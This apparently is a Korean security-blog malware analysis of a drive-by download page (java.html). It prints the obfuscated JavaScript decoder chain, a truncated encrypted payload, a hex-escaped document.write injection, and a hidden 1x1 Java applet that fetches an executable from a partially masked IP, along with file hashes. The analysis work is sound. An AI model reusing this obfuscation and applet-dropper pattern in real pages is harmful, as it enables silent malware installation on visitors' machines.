
security/악성코드 유포

http://78xxk.com/java.html (Trojan-Downloader.JS.Agent.gm)

File :

java.html
MD5 :  66a3a0be5fc181f1a9379a9a696c0928
크기 : 2.98KB (3,058 바이트)
감염 사이트 : http://78xxk.com/java.html
Kaspersky : Trojan-Downloader.JS.Agent.gm
VirusTotal :
http://www.virustotal.com/file-scan/report.html?id=0b1b210aaeb0adf9999cb0dd1144b5bdfe8aa377929a66b691444ba69368e82e-1323445327

/**
 * Converts a string whose characters each hold one UTF-8 byte into a normal
 * JavaScript (UTF-16) string.
 *
 * Only 1-, 2- and 3-byte sequences are handled. Any character whose
 * (code >> 4) is not 0-7, 12, 13 or 14 (continuation bytes, 4-byte lead
 * bytes, codes above 0xFF) is dropped without producing output. A sequence
 * cut short at the end of the input is still emitted, with the missing
 * bytes contributing zero bits.
 *
 * @param {string} str - byte string, one UTF-8 byte per character
 * @returns {string} decoded text
 */
function utf8to16(str) {
  var pieces = [];
  var total = str.length;
  var pos = 0;
  var lead, second, third, group;

  while (pos < total) {
    lead = str.charCodeAt(pos);
    pos += 1;
    group = lead >> 4;

    if (group <= 7) {
      // 0xxxxxxx: plain ASCII, copied through unchanged.
      pieces.push(str.charAt(pos - 1));
    } else if (group === 12 || group === 13) {
      // 110xxxxx 10xxxxxx: two-byte sequence.
      second = str.charCodeAt(pos);
      pos += 1;
      pieces.push(String.fromCharCode(((lead & 0x1f) << 6) | (second & 0x3f)));
    } else if (group === 14) {
      // 1110xxxx 10xxxxxx 10xxxxxx: three-byte sequence.
      second = str.charCodeAt(pos);
      third = str.charCodeAt(pos + 1);
      pos += 2;
      pieces.push(
        String.fromCharCode(
          ((lead & 0x0f) << 12) | ((second & 0x3f) << 6) | (third & 0x3f)
        )
      );
    }
    // Every other lead value is skipped, as in the original switch.
  }

  return pieces.join('');
}
// Decode lookup table read by nbcode(): it is indexed with a byte value
// (charCode & 0xff), and nbcode() skips any entry equal to -1.
// The table contents are not reproduced in this write-up ("생략" = "omitted"),
// so this line is not runnable as shown.
var base64DecodeChars=new Array( 생략 );
/**
 * Base64-style decoder driven by the global base64DecodeChars lookup table.
 *
 * Input characters are consumed in groups of four table values. Characters
 * whose table entry is -1 are skipped. A '=' (code 61) in the third or fourth
 * position of a group ends decoding and returns what has been produced so far.
 *
 * @param {string} str - encoded text
 * @returns {string} decoded byte string (one byte per character)
 */
function nbcode(str) {
  var PAD = 61; // character code of '='
  var total = str.length;
  var pos = 0;
  var decoded = "";
  var padSeen = false;

  // Reads the next usable table value. Like the original do/while loops it
  // always consumes at least one character, even when pos is already at the end.
  // Loose == is kept because the table's element types are not visible here.
  function readValue(honourPad) {
    var value;
    var code;
    do {
      code = str.charCodeAt(pos++) & 0xff;
      if (honourPad && code == PAD) {
        padSeen = true;
        return -1;
      }
      value = base64DecodeChars[code];
    } while (pos < total && value == -1);
    return value;
  }

  while (pos < total) {
    var first = readValue(false);
    if (first == -1) {
      break;
    }

    var second = readValue(false);
    if (second == -1) {
      break;
    }
    decoded += String.fromCharCode((first << 2) | ((second & 0x30) >> 4));

    var third = readValue(true);
    if (padSeen || third == -1) {
      break;
    }
    decoded += String.fromCharCode(((second & 0xf) << 4) | ((third & 0x3c) >> 2));

    var fourth = readValue(true);
    if (padSeen || fourth == -1) {
      break;
    }
    decoded += String.fromCharCode(((third & 0x03) << 6) | fourth);
  }

  return decoded;
}
/**
 * Serialises an array of 32-bit words into a byte string, least significant
 * byte first.
 *
 * The input array is modified in place: each word is replaced by its
 * four-character string.
 *
 * @param {number[]} v - 32-bit words; overwritten with strings
 * @param {*} w - when truthy, the last word is taken as the output length
 *   and the joined string is cut to that many characters
 * @returns {string} byte string, one byte per character
 */
function long2str(v, w) {
  var wordCount = v.length;
  // Read the length word before the loop overwrites it with a string.
  var declaredLength = v[wordCount - 1] & 0xffffffff;
  var idx = 0;
  var word;

  while (idx < wordCount) {
    word = v[idx];
    v[idx] = String.fromCharCode(
      word & 0xff,
      (word >>> 8) & 0xff,
      (word >>> 16) & 0xff,
      (word >>> 24) & 0xff
    );
    idx += 1;
  }

  var joined = v.join('');
  return w ? joined.substring(0, declaredLength) : joined;
}
/**
 * Packs a byte string into an array of 32-bit words, four characters per
 * word, least significant byte first. Positions past the end of the string
 * contribute zero.
 *
 * @param {string} s - byte string, one byte per character
 * @param {*} w - when truthy, the string length is appended as a final word
 * @returns {number[]} packed words (signed 32-bit values)
 */
function str2long(s, w) {
  var total = s.length;
  var words = [];
  var offset = 0;
  var b0, b1, b2, b3;

  while (offset < total) {
    b0 = s.charCodeAt(offset);
    b1 = s.charCodeAt(offset + 1) << 8;
    b2 = s.charCodeAt(offset + 2) << 16;
    b3 = s.charCodeAt(offset + 3) << 24;
    words.push(b0 | b1 | b2 | b3);
    offset += 4;
  }

  if (w) {
    words.push(total);
  }
  return words;
}
// NOTE(review): this listing of nbshine() is incomplete. Everything between the
// empty-input guard and the tail of the main loop is missing, so the block is
// not valid JavaScript as shown.
// The visible tail (v[0] reduced by mx, sum reduced by delta, result passed to
// long2str(v, true)) is consistent with an XXTEA-style decryption routine.
// That is inferred from these fragments, not confirmed by the missing lines.
function nbshine(str,key){if(str==""){return "";}
z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
// Encoded, encrypted payload. The write-up truncates it ("생략" = "omitted") and
// wraps it across lines, so the literal is not valid JavaScript as shown.
t="GhSI6ogoUBDNPP0jfVLuz4Hm6Ei+7aoM3CEe17FSeZKBW0L1ZllNuhB6
/ShcPzCYCLruc/생략/RlPelzXHnJN";
// Decode chain: nbcode() (Base64-style decode) -> nbshine() with the key -> utf8to16().
// The hex escapes only hide plain strings from a quick read or a naive string match:
//   '\x31\x32\x33 ... \x66'      is the key "123456789abcdef"
//   "\x64\x6f\x63\x75\x6d\x65\x6e\x74" is "document", "\x77\x72\x69\x74\x65" is "write"
// so the decrypted text is handed to window.document.write(), i.e. injected into
// the page as markup. For analysis, capture `t` as text in an isolated environment
// instead of letting the write call render it.
t=utf8to16(nbshine(nbcode(t), '\x31\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65\x66'));window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](t);

<!-- NOTE(review): presumably the markup that the decode chain above produces and
     injects through document.write; the page does not state this explicitly.
     It embeds a 1x1-pixel Java applet whose archive is named "apple.jpg" (listed
     below as application/zip) with entry class ScriptEngineExp.class, and passes
     an executable URL through the "data" parameter.
     Detection angle: an applet archive with an image extension whose content is
     really a ZIP/JAR is a file-type mismatch worth alerting on.
     In this listing the value attribute is missing its closing quote and the
     address is partially masked ("1xx"). -->
<html>
   <head></head>
   <body>
     <applet archive="apple.jpg" code="ScriptEngineExp.class"
width="1" height="1">
       <param name="data" value="http://208.53.158.1xx/9.exe>
     </applet>
  </body>
 </html>

apple.jpg (application/zip) ~> apple.zip


b8a1deb8ac5a7b0572a0601331d2ba4b  .classpath
e9a411939cd3ef76528685541ae69709  .project
5127569b4f83d8b42d9f2f20eecdc300  ScriptEngineExp.class
92d04d6bd8a0235843240bba30d2f091  MANIFEST.MF